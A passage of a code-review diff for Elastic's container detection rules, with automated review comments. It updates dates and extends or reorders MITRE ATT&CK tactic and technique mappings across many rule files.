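Review bot: The new `[[rule.threat]]` block maps this rule to a second tactic (Discovery, TA0007), but this file's diff touches only `updated_date` and the threat section, so the rule's `tags` array presumably still carries only `"Tactic: Credential Access"`. Elastic rules conventionally keep one `Tactic: <name>` tag per tactic in `rule.threat`, so unless `tags` is updated elsewhere in this series the tags and the threat mapping will disagree, which the rule unit tests are likely to flag; add `"Tactic: Discovery"` to `tags` in the same change. The same gap applies to every other file in this chunk that gains a new tactic without a `tags` hunk: credential_access_sensitive_keys_or_passwords_search (Collection, Discovery), credential_access_service_account_token_or_cert_read (Collection), defense_evasion_file_creation_execution_deletion_cradle (Command and Control), defense_evasion_ld_preload_shared_object_modified (Persistence, Privilege Escalation), discovery_kubelet_certificate_file_access (Credential Access), discovery_service_account_namespace_read (Collection), discovery_suspicious_network_tool_launched (Credential Access), execution_container_management_binary_launched (Discovery), execution_direct_interactive_kubernetes_api_request (Lateral Movement), execution_netcat_listener_established (Command and Control, Exfiltration), execution_potential_direct_kubelet_access_via_process_args (Lateral Movement) and execution_suspicious_file_made_executable_via_chmod (Privilege Escalation).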
+++ b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -115,7 +115,38 @@ id = "T1552.001"
 name = "Credentials In Files"
 reference = "https://attack.mitre.org/techniques/T1552/001/"

+[[rule.threat.technique.subtechnique]]
+id = "T1552.004"
+name = "Private Keys"
+reference = "https://attack.mitre.org/techniques/T1552/004/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml
index 1dc98471512..52c57446c7d 100644
--- a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml
+++ b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -115,3 +115,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml
index a3e3f977696..e44e8569760 100644
--- a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -130,45 +130,60 @@ sequence by process.parent.entity_id, container.id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"

- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"

- [[rule.threat.technique]]
- name = "Obfuscated Files or Information"
- id = "T1027"
- reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"

- [[rule.threat.technique]]
- name = "Deobfuscate/Decode Files or Information"
- id = "T1140"
- reference = "https://attack.mitre.org/techniques/T1140/"
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"

 [[rule.threat]]
 framework = "MITRE ATT&CK"

- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
-
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
-
- [[rule.threat.technique]]
- name = "User Execution"
- id = "T1204"
- reference = "https://attack.mitre.org/techniques/T1204/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Malicious File"
- id = "T1204.002"
- reference = "https://attack.mitre.org/techniques/T1204/002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.011"
+name = "Lua"
+reference = "https://attack.mitre.org/techniques/T1059/011/"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml
index 5da9a158df8..fec72adfd73 100644
--- a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -150,3 +150,16 @@ reference = "https://attack.mitre.org/techniques/T1204/002/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
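Review bot: The Execution block of defense_evasion_decoded_payload_piped_to_interpreter now lists T1059.006 (Python) and T1059.011 (Lua) next to Unix Shell, but the hunk shows only the mapping, not the `sequence` query it describes (the query body is outside this hunk). If the query's interpreter match still covers only shell binaries, the added subtechniques overstate what the rule detects; confirm the process name/args list includes the Python and Lua interpreters, or trim the subtechniques to what the query actually matches. The same check applies to the T1059.006 additions in defense_evasion_potential_evasion_via_encoded_payload and execution_payload_downloaded_and_piped_to_shell later in this chunk.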
diff --git a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml
index 0538c4cd9c4..e03bdc70ab2 100644
--- a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/10"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -75,24 +75,29 @@ process where event.type == "start" and event.action == "exec" and process.inter
 [[rule.threat]]
 framework = "MITRE ATT&CK"

-[rule.threat.tactic]
-name = "Defense Evasion"
-id = "TA0005"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1564.001"
+name = "Hidden Files and Directories"
+reference = "https://attack.mitre.org/techniques/T1564/001/"

 [[rule.threat.technique]]
-name = "Reflective Code Loading"
 id = "T1620"
+name = "Reflective Code Loading"
 reference = "https://attack.mitre.org/techniques/T1620/"

+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"

-[rule.threat.tactic]
-name = "Execution"
-id = "TA0002"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -103,15 +108,20 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"

+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"

-[rule.threat.tactic]
-name = "Command and Control"
-id = "TA0011"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
 [[rule.threat.technique]]
-name = "Application Layer Protocol"
 id = "T1071"
+name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml
index f84f1a58ad4..ad67670330b 100644
--- a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -99,3 +99,39 @@ reference = "https://attack.mitre.org/techniques/T1574/006/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml
index 4168f4a7137..d739ee6e277 100644
--- a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -110,6 +110,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"

+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [[rule.threat.technique]]
 id = "T1204"
 name = "User Execution"
diff --git a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml
index f09bad36a77..a240e78a308 100644
--- a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml
+++ b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -109,26 +109,31 @@ process.interactive == true and container.id like "*" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"

+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
 [[rule.threat.technique]]
 id = "T1018"
 name = "Remote System Discovery"
 reference = "https://attack.mitre.org/techniques/T1018/"

 [[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
-[[rule.threat.technique]]
-id = "T1016"
-name = "System Network Configuration Discovery"
-reference = "https://attack.mitre.org/techniques/T1016/"
+id = "T1046"
+name = "Network Service Discovery"
+reference = "https://attack.mitre.org/techniques/T1046/"

 [[rule.threat.technique]]
 id = "T1049"
 name = "System Network Connections Discovery"
 reference = "https://attack.mitre.org/techniques/T1049/"

+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml
index f5cef44a7f2..05fdcbcc1be 100644
--- a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml
+++ b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -96,16 +96,16 @@ process.interactive == true and container.id like "*"
 [[rule.threat]]
 framework = "MITRE ATT&CK"

-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
 [[rule.threat.technique]]
 id = "T1082"
 name = "System Information Discovery"
 reference = "https://attack.mitre.org/techniques/T1082/"

+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml
index 9a67f6171d9..91e58c85891 100644
--- a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml
+++ b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -101,3 +101,21 @@ reference = "https://attack.mitre.org/techniques/T1613/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.004"
+name = "Private Keys"
+reference = "https://attack.mitre.org/techniques/T1552/004/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/cloud_defend/discovery_kubelet_pod_discovery_via_builtin_utilities.toml b/rules/integrations/cloud_defend/discovery_kubelet_pod_discovery_via_builtin_utilities.toml
index 9e8e35195e7..fc8c6d397c8 100644
--- a/rules/integrations/cloud_defend/discovery_kubelet_pod_discovery_via_builtin_utilities.toml
+++ b/rules/integrations/cloud_defend/discovery_kubelet_pod_discovery_via_builtin_utilities.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -86,6 +86,11 @@ sequence by container.id, user.id with maxspan=5s
 [[rule.threat]]
 framework = "MITRE ATT&CK"

+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
 [[rule.threat.technique]]
 id = "T1613"
 name = "Container and Resource Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml
index 81381ad389b..ef16f2f9eb6 100644
--- a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml
+++ b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -94,15 +94,20 @@ process where host.os.type == "linux" and event.type == "start" and event.action
 framework = "MITRE ATT&CK"

 [[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
+id = "T1033"
+name = "System Owner/User Discovery"
+reference = "https://attack.mitre.org/techniques/T1033/"

 [[rule.threat.technique]]
 id = "T1082"
 name = "System Information Discovery"
 reference = "https://attack.mitre.org/techniques/T1082/"

+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml
index 5e447e2221b..10cc0ef66c4 100644
--- a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml
+++ b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -96,17 +96,30 @@ any where host.os.type == "linux" and process.interactive == true and container.
 [[rule.threat]]
 framework = "MITRE ATT&CK"

-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
 [[rule.threat.technique]]
 id = "T1082"
 name = "System Information Discovery"
 reference = "https://attack.mitre.org/techniques/T1082/"

+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml
index 6b685a4acac..55c1dcb3970 100644
--- a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -156,3 +156,16 @@ reference = "https://attack.mitre.org/techniques/T1595/"
 id = "TA0043"
 name = "Reconnaissance"
 reference = "https://attack.mitre.org/tactics/TA0043/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1040"
+name = "Network Sniffing"
+reference = "https://attack.mitre.org/techniques/T1040/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/cloud_defend/execution_container_management_binary_launched_inside_a_container.toml b/rules/integrations/cloud_defend/execution_container_management_binary_launched_inside_a_container.toml
index 6a1717f97e5..3ad1999ecd1 100644
--- a/rules/integrations/cloud_defend/execution_container_management_binary_launched_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/execution_container_management_binary_launched_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1609/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml
index eca6ed47139..2878c5eeeac 100644
--- a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml
+++ b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -132,6 +132,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"

+[[rule.threat.technique]]
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
@@ -149,3 +154,21 @@ reference = "https://attack.mitre.org/techniques/T1613/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.001"
+name = "Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1550/001/"
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml
index aa6c4f5a487..545c68ed42e 100644
--- a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml
+++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -78,11 +78,6 @@ file.path like (
 [[rule.threat]]
 framework = "MITRE ATT&CK"

-[rule.threat.tactic]
-name = "Execution"
-id = "TA0002"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -93,23 +88,43 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"

+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"

-[rule.threat.tactic]
-name = "Command and Control"
-id = "TA0011"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
 [[rule.threat.technique]]
-name = "Application Layer Protocol"
 id = "T1071"
+name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"

+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"

+[[rule.threat.technique]]
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
+
 [rule.threat.tactic]
-name = "Defense Evasion"
 id = "TA0005"
+name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
index 4d369ab6944..1b2800b05ca 100644
--- a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
+++ b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -97,6 +97,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"

+[[rule.threat.technique]]
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
diff --git a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml
index 8c8ff36688b..28586e1bcca 100644
--- a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -125,3 +125,34 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
